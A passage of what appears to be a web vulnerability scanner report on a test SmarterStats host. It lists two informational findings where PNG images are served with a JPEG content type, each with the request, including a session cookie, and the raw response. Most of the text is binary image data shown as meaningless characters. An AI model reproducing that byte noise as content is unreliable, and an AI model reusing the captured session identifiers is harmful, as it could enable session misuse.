.K.z.)..D.#~.qAq.}...g..A4_..........F.Q...v]>...>.V-].X...-..A.;........-.pF..D3.Q:..+{...T3:jFE.4....#...........B@#.....(.R...NV2X<...q...XT,M..a@.;........,.pF..D3..@_.j.)...........q]....H.yg........|._._....r$.0...,A.T.......I...K5....dwJG4"..=.....#".Wg.G.y...-...j.#;?...^.b..x..;.. Z& \.$....9...e.....p.H.N..u...|}.....}..8A._..'k.S:. z...p..h..#.R..#..(.>....A....m....m.2.h..A..,    ........2..1...p.....    .e.B..I.....eH....7...(..>..^Q.........2..`.q... ..t..8..aA.3.. .DBU.    .....y.)..;...@.....D8#......c.k.._..y~    ".>..^Q...m... ".f.".#O;...Y...=4..r."..".g..5;.g....V...}..
6......g..A43....kU[!.;k...3?zZ."...n+.(....c.F..D3.Q.h......|.2..j..wMt;0.A.f."..D...e|...f.<...._..-=4..+..D.]....q.]cA.3.. .... *..h...3..?..V.z..vMt;0.D...4.H.....eH...G$y...Q...Y...,
..o2.h...    <.h>..=..D...Rzh\~#..".H.....#.pK..q...t.^..D.....g... .8......<K.rr.1R.,..,.O.v*...L$..D.=..~Cq...FD8cD..H....)#...}...*..W"..An..(...zc.F..D....D.Yc..c[.jj7B^=......,...Y... ".4.6.........z<.ZS....A....m.A.-...q.T..."..i].]3.c.'..D..9.6.q...FD8cD.L..D.aO.I. ..*.C....F..D....O.....a..9.......nE.[]...."....+q*...('G...f...=|.28.l@j..W....Q...5.....#"    L.<..    #........
.....nE.[]....-.pF..D.O..D.^..&..D...nu=A.L@H.3...."..i]...A...r...Q}9.....-.x..Q.........j...(.b..D...AD.I"....4.9..z.....d...._aA.3.. .x.$..v.4.9......,..F..D./].....z...fd]l[...I...|.\....F#......g..At.AT.M...6?)2E .&.z........-j...e.D8#....
.*...Or.M..5wb...^.....v.... ..K...AD.]P.U.>".K.Y5....i.&.z..ggg~g..\WbC..k>./../.......#k+K.-.d.....D.....p..[....^lA.3FD..RA.._.`...f.e.n    G.D.....AD..D..`u.?v.RmP:H.z}...?...@...E.D8#..".(..n0.:..0p}.9..)..S..?.g.......B. "..8..W[..,.a.cD...n.t4"......AD.i<k.cD}.o?..Cc.p..p....H.-...V....-U..eH.2..f....^...'..    .q.=.FD8cD.L..D..b...A..d.&,FAt.y... ".4N%..#....A..h.|\. ....".. .(.....pn..'...~.\c.F..D.WbD.Q.%..D..=n.P.D.. ..AD.i\. ..7..~m.... Z& ._.R.....eH..1.!...s{.<.8..m#".1"Z&.."    V'.G.5.~Rw... .<....D....$.cD4dD..k.....P#..".H..8.:".d.f.-...D.W.......Yr......I.~G.5.._..W.8..a#".1"bD.q'    ..5..k..@v..Q...tc.F..D..F.p^uD..@v....2.!...6wI..Z...........i6"..#.e.. .`u.y.........<.j..A.q?    .........`t.kv.S...AD..D...y...p..F.A.d."..D......i.k....n.....D...t..R...!L.N..T.H>5.n.c7@....O2.h....<.....j.......#....1.8..hA....P..C.Ww....U\...m. ..D.q.7.....,.p......).......>...m. ..D....zEA........0.a....M)o....u..P.....AA......A4...\....o...A....N....F).......3.h....5.!RI...>.}.....n...........D8...S..].c.....5P.....!A..R\....p.r@...    ".I..}.z5.r.....m.6.........u................ ..(...}....y.@.-.z.1.^..).ks.Ej.e.D    .GC. ...._....@......\4.FA......hx@. z..b]@w.mM..._Z]..s.........*....<......Q.svvf...].|.\.t.F............:"2-
..DD)o"G99.puf9)o..6.n9.........C.=$kU..r....Wm....w.s....i..P 2...s.Y....5)...T U...".N...T1..
P.....D2...
P.!. ..T....T....Q/...
P.!. ..T....T....Q/....7......(#../{...F......$,....nr.....k..S.D.......F.7u`e:a.....Q.2..4p]XN..&....p"#A4...=c.y...."&...(w.Au.(G..N,..R.M..r..... .H..m..H\TT..P.\....8.._..e.a..........R....... .H....e$.....'.r.Q.a..^p..W...h..k.C..A4........L    .^]&m.}..,..E..6iu.Q...B.(nu....z../Cq..=..V....q}.,g.D(....-G;..]....m...Y.e...`u5.b.....we.(c.T.......T.6./.Sk.h.!....~T.
$+@.%K..T.
.. ....~T.
$+@.%K..T.
.. ...v./.1[8..u.Z.#wm...*.u#@].l...,.r....lt]..t....RV(.~jeT.......&..jv.+v..s.......N..uv........o..h9..o..+._?|.s.......s.3....,..Sk....ng.2...e#.....].s.t{i..c..".T....r.W..4...F.a.}..~.E..RF......<VF.:*...J...K..u.Z..k..T....8F.O...T.....+.].....a.M.n].&eri
Xk......u...(..D.}.K.4.Q..PI:../.\u/..I@T... ..6.b.`..P.S
'.i...w._g.V...o_..VB....}...,...q...k.RLq....f0.TX.n.....T.[..C,..........t].^]....]y}.
.]....3"...*Mm..0.T.O.....).V.@D.;#......d..~.D
.......w    k.:.J....    .u..we...MK@....N.~....NLL...o.hv7F.
...<#..A..dQ.>..{.f...._5.X}.......m.jg.n@.!.......)@..dc&*@..
.DH5y/*@.D
.D"...
P.....RM..
P.....H6f..T...A.T....T@..A$......@*@.!.......)@..dc&*@..
.DH5y/*@.D
.D"...
P.....RM..
P.....J.!%..6d....IEND.B`.

10.21. http://vulnerable.smarterstats.6.0.host:9999/Temp/53bea176ee1943dd981fd05e032eff33.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/53bea176ee1943dd981fd05e032eff33.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/53bea176ee1943dd981fd05e032eff33.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1647212677","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:37:44 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682C7F131D80"
Content-Type: image/jpeg
Content-Length: 8473
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d.. .IDATx^.].......5.F..A1>0Qs#*o.<D...!...E8.S." ..7.../....|.C .9..8..BV....fy...w....P.w..L.L.......s.^..2gO............\@.......N..........B. ..@ u. D.w....@.B....@ u. D.w....@.B....@ u. D.w....@.B....@ u. D.w....@ .B.%
.&..T,.BW`.t.r.6...............|[.....5.D......hE.U.Q.<{..# ....R."/xD....+o...[.s.8....D [BD.N...<U.T%D.-/..j!...[kkk.8r..,G....~.-
0@.h......,......Y.....$F.^$.6^..MX.w...!.#B...d.f."...U#...P2.*...Q.........;...yH.B..    .z.f...$.;.%5....-_yt_|..>5#.q......G......!R.... ......*...Q=(.
..#{u.U..!RAK.mV    .i.|...f.a!r...J.....l!R.../..C......a!..s./A.b.....J.N..;.%5......H-htX..:PT.#..C. D.....Y%..i.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(    ...C,.7.e.!....E.....Q^}&q...F.`.wY.A. D.@.md......I.W..%.^p..~.....(..L....#D.v?!.....?..B.
..F."....3........w.....u.B./.B.n.7...J....
....BW..a..U....XY42.X:.o....|.E..7......2n\...>.p...
........    ..TNxt.XmWA......}......K:.@f.h..2.;MTO.}?...B.
P...(...hAr3!..0!r..+.J...PNTgA.o...>.C.B....F&    ..qdD,8....[>1{.. .}L!
...;....[~.:B$3....$J..#H......B..    #F."#0......._.B...&VCc
..nE.:B$.....|QP.."D....2!.P........8v....%..c.@|!.f)4....q. ....fUm    .|.L.C3V..jd..9.F..hTOv..B...3...EL!*....\y..."`N..G.B$...'....s@.Ii.~iB;....0G....F .V8.......w.....e..S..D.........f.w...=.............)B$.n......cK.s...3.$.....B!t]..uL#dDL.4.....T......,......^..!X!ly....S...$.&....mY.|.F....Zs..|ff.qc....w.s...LX.|.n.!..id. s$D.......=.....(..R..Bd.zS.H.e.=..9;F.I;..MgfD....Xu[c.!2.U .y.M.+i...=.$-D.-..C2w.....P.....m..I..)../.-.|..#D.Y.........zg.5cF...w.)B$.2...*.!j..p......W.(C.n8.v9}....>...cn*.s..-.....=..f.A,.>...D..Jh[.6E..b.......U....'....jJ......C.X.d.....N0A..Z...#....R.6..,vt.fuCl!......b......<. .y.Mes.>.-...../...S.......#[    m.....T.....g.r.........."V...!#2.U&..T..{}di......$D{:_fuCL!r6.2.c...Y.&b.!J.......17...>... v].-.\..jhL!r..vf5..D. D...X9..<.....w<...#D...K.....".z-o.`.....(1hC+..........&...;.!.y.......6.6.......y.M    ..g..~........Y..90A.X....B..Nve&p.5D..P. !..b.o."..+Pt.. .n....{8.....3.....!Z........(..@f....K.ww...OG...f.w.....g Dl.t.&M...V.....u.w,?6....<5...$.P..VR....    ...'i..w.V.3{..........F..y.%..r...d....n.4!.l.|.G..g......Mw..UVW48G...e,...A...-o.2......>.m..9B4...WXmP..'5.v.Z52."V.h5..i..]Y...>.a../.vN.e..D..2!.N...    .&.XI.n..&...07.;.3....#B.....%    ........Bd.s.BD.3{|....M.e.e#{......;...'...<.&.h.....]w.-..Q.y.B....
.+....
!R.../@...0V.I.N....{.#BSd....,?....+.    C.B....FI.B..U...pt...F<...bs.dY.]N.<.${.p.."..;....c........\........14....D.........t.$......O..M..d.{9..b+p.......7|0....D.....-......u42......$    .tk.{0...zJfDK~.$6}..,{.4...    .......V..u.D..a.`.D.f.U?...B....F .V8..%.....R.V..#.rD...3BT|.P`F.~j.fB..U.z.......f.k..I."i..{0..>.._.uDh.,{....;.......8S..Q=|!...;...^.......Vy2.[(.P..b ~...h.........b......02+D^.04ct.f.d...eV.$..?Y-.-.....ry.O..`./D..U....b.v,3[........}fM._..........Q.1~....f....MJ{.@R.....D#./..I..]g../.7A.Y............_.T.....u..f...."IB....>...0.3{j....=U../..#*eD.&.....Pp.... D.c.2..8..I.(.3....4...T....5>..<.+..!......QA......W.{0\..l..?...._.-.........>..|.9"....!#J.......1.;&...>......q..r..VC...w>..9....c!D.X.j..!.:.R.|....g6...b..q..r...%;Gd"...."SHW..2..<...}...cC..z.\Z..f5TKF$W:{..FF..^.......$..% "*I
w.}f+[G8"4.\Z..b5K..U..8T......4J*..t+....!
..._.-.w.9..X...[v.."....V.dD.<.f`+.m..B.......E.s..    _.u.yV.7......;.Y>.7.9":K......_.[.;.Q+..zW......sC[    m......\W.+.,.6-!.P%.6$D...\{....n1..~....G...k....]...V.!D........I..........213..wT..G..........%....s.........VB..7.(8....!.n...;    .Q..}G..Go...:.T..PQf....9.pg[    m............5...lF.:.}^....1.........Q.."[    m....`!.y.i..S....f.~.c....u....3Q.bF.-DnVt......R.....o.Qmt.......i    .9...X....%!Z.1:...>.9..j.d-+.....o.Qm...;..y..C./.`Q....u.....h..L.w..].Yy.o+.m..BTKg.5B..{..C./Lg..B..DB..."NY..`9iM+I.p.Jh[....F...c...5..fL....U.....c....[.,.&3.3[    m....Z!r.w.:.h..uNc.^7.....%t@#..:.(#z...v..v_9<...3[    m....Z...w\.......(.A...|..Q...G.k.(%M......!..xz{.....)D.k.....V%    ..s.*.....H......!..xz.<j].@.l...........{&.m...
...?..c..l%..~C.j#~.......!CB.6...2...5)..../.gt2]......o.Qm....I.......),z4.....y...W*+....-.Rl:. ...Jh[.....;. ?.....1&D......^U.....7..A..l%..~C......c....)D..?.z..s|)N.=...h..a.e./...._.v15-.....!..:.>q...~......Y.hph..}...,?R5.+DKZ...........V.!D.Pw..1....."..........k{....hh........;..VB..7....t..eD..x$.?.;'...`F...+:...6..OB....Xe..;dG..    .VB..7...+...e_
....g.    ..6.6jD...=(....wSi.....o..?....a?..".Y !Z~vp.2xy/A...q.Jh[......v..]ym(w.....E....]f....._...m%...v..y..x..a..."........].U.il......!.3..w.\wC(w..&Q!*........(i}..wR...oR<l.<...jH.....].|t.....<.R.F...V.!D.....On.%.;.ox#...Q...$.>.    ;T?..........,....y...B40vYzz.<...wyG..E!.{...V.!D.(..IL.{[(w..<.
w;.....n.U-8rx..ia......!j...uk*g..Jh[....Y$.w|pg(w6v+!..O...{.H#B...*..u.kg..FJ.........H....{.|}.].................p?.?a]nQH..
S....3..F.....z.......V...U..]U....B.....Xt.94c.....w...5.d.g.[..!.QV......~.#......Nn.....!...]U......!.....{6..z|........._>$.......6c..m%..~C.*Bt..6..[.7....JH...X-i..2.%...(s>.....f.q.....o.Q.h..,.....z.Y.!.+SQ...VH...H......mLl/.....o.Q.W.\.i.uuy...D'..$....h.W........6. ..
u...W.e+.m..BT.^z03:c]..?.$+.14s`JJ.\q......[....G.
.s.f+.m..BT........B..Z.QQ..L.....b..k....k..l%..~C.*..,.;......c.....Q)#Z....2...23........l%..~C...I.o...8xg]....EQ..w...}.3ce....N..u..d......o.Q1..........S.7..?..qdD..h.W.&L........
..0..I..l%..~C.....f|..O.......b.BT...:..+O..I.&Y[    m............8...1."..%!Z....2.....1k+.m..BTd.e.CV....Z..W......~.x...jA'.5r.Jh[........C........dDl~...~.e.......-3.e+.m..BT....{..;{Grfm.c....Qih..#D...O...3...{.Jh[...    ..)....'.3k D|jSF....R)..^%.M.q/[    m..................FFT..^9...Fy|.r.G..VB..7.H.....N.......X.!*....P..........8.....o.....-pN.......#Ya!*    Q.#Bi.y......l.8.....o...gm..p../o@....9.....V.Si's..VB..wO."z.(=.......7:xg.##*gD.    ......._.vQY.l%..~.t!r...~.6..2[#.@.../..V...N)D.l^.........h.'..C.^!.~q7./..=.
idD..h...8..W.....UD...V.{.....Mo^....sM."..%!...P.e...dVD...\...V.M...-L.!...q5..;?D...
.H..hh6...S-.....    ...R.H...~..":.........W....5....NG........
.H... D$...}O,.7A.s!_mm.e..I..e.....O.....H...v.....4r5.;.....*..QLC..z..../.J.<.r...E....D.Mm.;I!.a.-. .y....Kmw.b....v.....#..$.......+...s.Y.b..4G..)..S.................l.;)!.c.....\)f~.'4.i.....Y.....;~+c.bT.'.....".QI..:".vy..G...W*.!k+.m...2.1.N_ q...j1.X..q8......+gus.    ....|......."..K#...=..L.Q..VY.,>:.X...N!"!..nR...f/...D(:.......Z..z....5....of..m...CY."#*    .K...Y(...V...    ,Vd$ld......V.W........{..^'.(.7...../..r.}..\qv.+. D...9B...;.W.....s.    ,N.I.....!...$".,.RL=tK......R..n..4DS..}[.._..sE;...%.....73e.......Y..b.....~7"D..tF9eA...........<DS..........Wl?...fER....
9...$K..U...    ..O(....m....X...4....BD....<...x..........Z.!.
........Ol{..u.D.)/.$..D!......(.v{........]...C%...L..l.;........*1.w?..g.....-..=D..N...c......wY...X .n..Q6.....].LQ.n.T...-..h..G..h....o>..O..{.....-D..m.P..8$.(......b..    b.G...^}.#......G..W.?Glp.......?.^......-.Y"fm.&&m......;...h....V4_B...e. ...z.....].......N.I$...*..h...H.b...Q.=.i.h~{..<l_...x[.7f.u...} ...@[^4...Q..E!"a.p...#

zrAD.Eo..#m...].u:>7..+.:(#...j1t....3.o.V#W8C.......77L.......Q.}..^r...(^h.......1E...AM.J.........w..h.q..y.b.B...*..Qiii..6mB.....1.._......gh.B+.F$.6^..MX.w...-...o..M...OV.;vL?..j..w[..n.....{
.=+Sx|..V.....
..V.T@.-....".!J......................p....n&D.....A.K...7..s..tM>}...F.........Ym.........].aA6...=pob)..X*...k)..7...f...f.w...H.(.=.A..'g.Z........\>/......g.Z.Wp.V....Y.B../..E&.%ojq./..hS..A?,.>..W..?...e<N<......[...U.=..&B..".)....w...W7..~.K.Xp...O.=..,8.....Xw......|J..`..{....7NB....Y
....8.'D.?.Y...    ...:B......o%U......j.JT.J...Qu
.&JY.....~.jV.....X;.!N...nF....8.....&$....R....n..E..o.u...OT..V..J.B.2..D.H.=U2:.G.)2.o.B..vT..kp..g."e(N..D.#o.ds.y....g~+-.{TF.!B.9..Ib.(....h    dD....I.s2Y......fYlGi..;.....e......_.......v....(R....5.~n.z.#J.i..4DK"#.M....U..%=....9.....YjG...    . 2;.r.q...b`].......*...}.).Q......fasJ._.6...?..."...........K.~.....v...ib..c9[2.'..Y.X..y..........I>>..@ ..@...C...... D=...D .u. DY.!...z.......h"..:.........=...Q..d4..d...Q.{..........t2.......(.=...@.@.B..:.M..YG.B....@.. .!....&...#..,#t.Xy......IEND.B`.

10.22. http://vulnerable.smarterstats.6.0.host:9999/Temp/56dd80bb97d8414fbcfd594ed4282909.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/56dd80bb97d8414fbcfd594ed4282909.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/56dd80bb97d8414fbcfd594ed4282909.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=Webmaster
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:33 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8B4CAA00"
Content-Type: image/jpeg
Content-Length: 10264
Connection: Close

.PNG
.
...IHDR...l............    ....sRGB.........gAMA......a....    pHYs..........o.d..'.IDATx^..y.dU}.9.7.......q_A..eu...b.v..tD.b..WD.E.b.Y.}A...c8Q...`.f.Y.A...<....~.......{.w.}.~.W..s..LW........>s_...... ...@.....k.;....... ...@......"... ...@...     l....A...... ........ ...@...     l....A...... ........ ...@...     l....A...... ........ ...@...     l....A...... .....N.!.F/......>._kuz/M....OY@...... ..O..G.:-i4....Ii7..s.....lK.....-...../.... ...,Y..#lCC..VcF...gE..P.]..........8. ...@........\.....LZ.R..,.6..g.f....&:...@.....R&0v....x.s.slQ.f/}....E........q.....;.._.......5@P...50oLMM...c*l.7..7c6=..sI4J....Q.y..........?.aoG.........YA....?.{.{.t..........m4..Z...b...^..f..K.1.n......1.......c`vm...~...fW..8aoG.v..........
[U@...Ho......#`.ej..?.aoG.a.b..e..j..3._Vc.g..n..l..W........a.*".-._Vcv.,|Y.a../.1....^.....n.{.-....,|Y..y..e5.}......FXx../...!...."B...e5f.......Y....?.a....0....G....a......7._Vc.g..n..l..W........a.*".-._Vcv.,|Y.a../.1....^.....n.{.-....,|Y..y..e5.}......FXx../...!...."B...e5f.......Y....?.a....0....G....a......7._Vc.g..n..l..W........a.*".-._Vcv.,|Y.a../.1....^.....n.{.-....,|Y..y..e5.}......FXx../...!...."B...e5f.......Y....?.a....0....G....B..|.5.5Y0....&.+qq......._.ZIM`_.....=.V.l.M......_..(.U>.y..=.-....[............J..
..-.[V)..1'-...........
[...F..f{r.]N..I....../....j...9i..%......v..Q.:-i4....Ii7..u...4.-.h.W....]...x...(.1Y....@...?.aoG`..m.fGZ........m......
...G.MS1...'-.q...............I.+f.g.Z.m.m.y..X    ..a..[.6M...2..l...v.a.{;.c,l.../..>..#l.....l.....D1...A..%..J.l....7...j..(V.SSS.z........3m.....\./..
..-..9*.E.
....x...o.....#0.3l3.68..|m.M......0..bT...z.....MQ0c..'-...........
[|K._..g.f.......A.....n\M.8iU.y.....?.aoG`L..*.V3l...J..a......I.v..o.....#..e.G.....e.R..s........=... lY.....0..-.[V)..1'-..............J..q.... lY.T....l...v.a.{;..[.{../..[V)..1'-..............J..3l...e.R..s........=... lY....kA...a.*.Z5..e;\....{...@...[    .9A...a.*.Z5..e;\....{...@...[    ....y...UJ.j.I.v..o.....#..e.7....as..-..j.....p...?.aoG.a.bo%lg.Y...-..j.....p...?.aoG.a.b.....a.*.Z5..e;\....{...@...[    ....K...-..j.....p...?.aoG.a.b.....a.*.Z5..e;\....{...@...[    ..0..-.[V)..1'-..............L.....Y...R.UcNZ...;.........Ii7..h..lO...N..||....4.n..........Y...mT......l...v.a.{;.c(l]....4.M.9[.... .l.eZ.s...Y`....8"l.v.j..I....m..v.a.{;.c(l.0...#.f;(..%....E...{{.c%lo../.[.6..q5}..Ug....|[........lq.lF..3i..D...F.:....4...    .r6_b.U.(F.d-.'..J.l....7...j..(V.SSS...........u..E.......}.M#l........ y.3l....>.?.j83.f...6_.9.....\Y....g..
[...z........m1{..s1..^7.G3Z.%`.XdG....(l........... .Z>|.m.&...d5.v..!......qY....H...?.aoG`..m.Ww4..l...;I...}...A...a...W..NZ.p...-g.....qg.......a.&k.?.[..g.-....%`.uj..v...,.V.../.B..a.*.Z5..e;\....{...@...#l}qD..J.V.9i.........v...,.V...0..-.[V)..1'-..............L.>...Y...R.UcNZ...;.......-......d.[...R.UcNZ...;.......-........[...R.UcNZ...;.......-....}..r.. lY.T....l...v.a.{;..[.{+a;5... lY.T....l...v.a.{;..[.{+a{c.6oA..J.V.9i.........v...,.f... l...e.R..s........=... lY..... k...e.R..s........=... lY....8j...g. ^.U.K.1'-..............J.N....-Za.;N.o...CO.....b,    ....['.u..c).#lYu....Q/l'.a...-m7........_6Q..`.gU....Ka..v.!.F/......l7...UpV.vR.a....}.$.gA.FU....8.x..4..&._.....^..c(l])kuz.l.-.FS....wKz.D...........<(........
..(..E8p..*{i..MT.>..Y..$..P..../fQ.......z^Sl.[_......D..a.T{...i..^..e.....zVe/    .q..8..l...8.6,l.iug..z^SlV.vB.a........W.6M.#li..oiN\..v..a?......q...K.y.611!Q..K,.*........~.........._......9..MP..R.SSS...x}...Y........>(...a..
.ga.-.X..t.x..4..&._.....^..Nf..7
.\....s......G......Hk.....Wl....7Y......A.|.aS...".8.x..4..&._.....^....mP...)..wZ...........l)_.1j.V.v\.$o...1A.|.a.U...s.L.U.../..~}...*{I......m......=....L.n    ..,ja...E..aK..8p..*{i..MT.>..Y..$.].......;8......]%.Y.......-za;*... li;..4^e/......{=......a+{`.Z.......[..vd.6_.
...."^SU...p...............a..[....A..=..W..f.v.V9.Y....#D.%E......[.DV...U%m.......}......E!.{........+..o.J..    ..-zak.a...a...w.. l^..../N\..U.V.k(-.2.7......I[...... l....}....    ..A.|.a[.....r..........a......L.n
..,za;<.........y..Vl..k+..n.`.{;...63...K..}....^..... k....o.&.,i.vI.6_A......    .P.....{...0.6.o;...[_....}~...-.[.~\..H......v...,.V.v........}......}n.;.[.....v....!.=....
....y......K.G.a........W..m.E.9gA......    .P.e...Q..(.;.Z`._..n..k<.2..a.&k.?ja...".."l..r.x....G'W.@.......#`:.6.m#l.:.b..q...... l.."l.m.@..aS.:c...`7.......-....[.....E.%M.V.a...-k7.]c..n.`.{;..[.{+a{C.a......_...WR..3...oA..v..5F.......#..e.7..O.as.......W.... l...e...k.4...aoG.T.....Ii7..x......V..`.......6..........y.Z.n?@.YR......-..z.......a.=....
.b.......(pM...&........Y...[_..... l..$l...[..a[.c..u#vc.{....Ka..Y......y.6$......{{.c%l...6oQ.....8K.......-...Chu}@..c=wK.........75G..3i..D..m.A._/2s.t...    .A..E/l...+).v..s.[.6......4T..a.c....qn.u1G....rB.<[.Y.....D....K<xV.(F..Y....Q..b....%.kT...Q.n.|...~i..2.....75@.....*.p._.....I..%Qo.....a..~A.|%e...Mo.oa...c...1.f7D.....%tI.{'.....9...[.b... ...sc..#duI.....o....A.|%E.>...[.6......4T...rv.a../...>.....S...zx......}e..gI......
....REO..*(.......X..->V..... y.^.....+).v..... l...{...`7.......-....]...Y...W.6_I..OmZ)...e...k.4...aoG.a.bo%l..Y....}.5"..&lo..+.[.n\..H......v...,.V..<.......A.|%E.n......-k7.]c..n.`.{;..[.{3a.6.....m. l..&lg.a...-k7.]c..n.`.{;..[.{+a{}.5oQ...^%.,).v..3.[.....v....!.=... lY..... l....=...
....p.J.U.../..~}...*{I.#lY5e&l.l...E-l_.].YR....o.oa.-k7.]cN\vC.{...@...[    ..A..E/l..a...a.v...[.....v....!.=... lY....8......q.$a.p.\.,.[.n\..H......v...,.V....f..."l.l8M..a...k..i..2.........J...a....}~W.gI.akm8U..a...k..i..2.........a...^.v    ..+i... l...e...k.4...aoG.a.bo%l...f....}..".."l.......-k7.]c..n.`.{;..[.{../.za.9......'.?Y..a...k..i..2.........J...3l......$.,.[.n.I+.W.K..l....^...%a?..6).fK:.U3.nJ.......}e..G.....G...<.........$.....=u.^..e7............b6 l.mi...e.)]g[.y..X    .~..$......a..4a;1... l..u..A.......#0..63..../lq.m..Z.{..5.....Q-l..T.YR....'.. l..u|.A.......#0..6.../l.iI...F.f......    .r6_..\e....f..%.k.......w......z........_...L..*..MP......J..p&..Gy.......}>.I.E=.....8K......'.........~....o.......a...Z.K..d-.G/l/
..+i.."... l......i....-...v.....\.g....`.y..X......[..v..E.%E..Zw.x....Y.h...n0a.{;.KI..{....... l......a...-...I+.W.K..l....^...%a?..Vv.l.>......y.^.....WR......oa.m..uO[..e7.......-.=...G....<.gI....;Z..a...k..i..2.........J.^....-za{n.6_I...G.G..a...k..i..2.........a...^.....WR....G.. lY.q..#vC.{...@...[    ...........q..a...#.[.....v....!.=... lY..... l....g.a..4ak.a...-k7.]c..n.`.{;..[.{+a.3......YA.|%E..X.....-k7.]c..n.`.{;..[.{../.ja...".........x..4..&._.....^...[VMY    ..>.Q.E/l....+)......oa.-k7.]cN\vC.{...@...[    ..A..E-l.~........;L.E#l.?.i.5Y;..l.4.:.aoG.a.b....Q/lO...+i.vh.6_.
...\"..%.G...!.W.K..L.i..=..V1s...............8K..]~.!.-ja.."y.Y...C.'.tfe..}Y$...{.-.j.ZX    .n.. ......a..$a..`..Y.......[.......k.."..s.*...&./    d....a+P6.&.[_......q..a...........e......~q.xK.......&....aoG.a.bo%l..3l....
..+).v....[.......[.... l...e.Bk..a..2./1a....h.....L....7.......].. ......,.,)...5..[....9...$    ..O..9...>\...H..0.~I    ....M...&..l...n.,.@."l}q.......J...>...h.m..g..$    ......E#l+..V<...\.-#vc..%%l.i5.A...qvmpVm...+O+a.%..y.Z...G.gI....9P.E-l+W.fgI.....+........xL..Q.g^~.x.....:.P6Q..`....;.6pItZ....NK.3.JG....}8.....m. l..&l..a.....u.lv.4a;*...h...S....
.E....%....P5...`...-....O..y.8......    .r6_b.U.(F....-._.8t...p...Q}..G1z....K....G1.t.....5....(F.mi.K....G)....]&.mT......Aw....w^......yOMM.j..L....3iu.$.M.b.3l.........w.. l...a.t...-I3l[...+.....X<F;...{.x.3lK.......a..    :{.3.\..a.Sl.7....5..1..M.;_q.x.^.....WR..=._+.......*..$l..$.9.V..9.a.....{.....a[Z......:.....S...zx......].w".."l.^..x.Z.N9E6:K......W.........
...-.-.....f.....].V7.....[....A.|%M.....+Za.p.I.-I..y.<.,Za....x.V..:..x..V......6.-.B...CA..E-l.<A.YR..]...o.
..../..&l..a....]u.o.c..v..6.. lY...5F..........Y..."l....x.V...X!.."l.n.[.E+l.9...1Za;..7.. lY...5F..........a.....M.a.....K..;.......cd...    ......V..<...1Za{.O7.. lY...5F.....5....as.....Z.YR...{..oQ..QG.zgI...{......+^;%......Q..a.:}..1...e.....4.......A.|%E....5.-Za[w...-i..[.6_.
...N..h..... ...e..j..aC....a...^..*....    ......Z..?\.9K..m.E.u...]...x.V.V.a.....x...5.N@;....5..._?..;....^.Yz.tP.HX    .K._/....O.......;..S.E+lk.=T.%I...I.u.....US.1Za;.G..........o..9..e..W..]b.4.(l....]b...@.
.....8......qA.|%M.^...W..v....Y..m.K.Qg.
.{v....
..?\/.."l.._%.....^.#...a.....[....S.&.[_.....A.|%E..
..-Za.o.r..4a{Q.6_.
..v....
..?X/.."l..;W.E+lW|...-)...c... lu..........6oQ..'.\.Y..m. l....{.8@.%E..Y.|....]....c..v...oI...kW..h.....).."lk.\).......7....~`.x.^..,.......w......5.....    .s....V......c..v..k.[R...{..o.
.{...xK.....3.[....W..#l}qT....T.YR....v.oQ......gI.....G.E+l...!..............kN.o.
.%.~O.%E....T............ ..y.^..$....    .+....Z...G.8K..==...h.m.s....
....'.."l'.>I.E+l.6.+.."l..}.x..Vw.*.3a.,.......?.q..a[..U.E+l...K.%I..{.<.,Za;.....h.m..W.%E.V..B.E+l.s.-.."lw_.B..a+ <uob%l....-za.. l.."l.wv.oQ...{.jgI..'.a..........h.m....oI..#.:R.E+l....xK...u...-.[..k...F..M.=.~'.[_.....?.q.4a{E.6_.
